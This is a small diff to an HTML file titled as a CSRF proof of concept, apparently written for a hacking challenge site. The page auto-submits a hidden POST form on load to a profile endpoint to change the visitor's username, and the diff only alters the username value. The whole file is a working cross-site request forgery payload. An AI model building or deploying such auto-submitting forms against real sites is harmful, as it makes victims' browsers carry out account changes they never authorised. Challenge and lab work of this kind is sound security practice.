--- a/index.html
+++ b/index.html
@@ -3,6 +3,6 @@
 <title>CSRF PoC – change username</title>
 <body onload="document.forms[0].submit()">
   <form action="https://hackingchallenge.spsglobal.com/profile" method="POST">
-    <input type="hidden" name="username" value="hchai1506">
+    <input type="hidden" name="username" value="hchai150hjhaj">
   </form>
 </body>
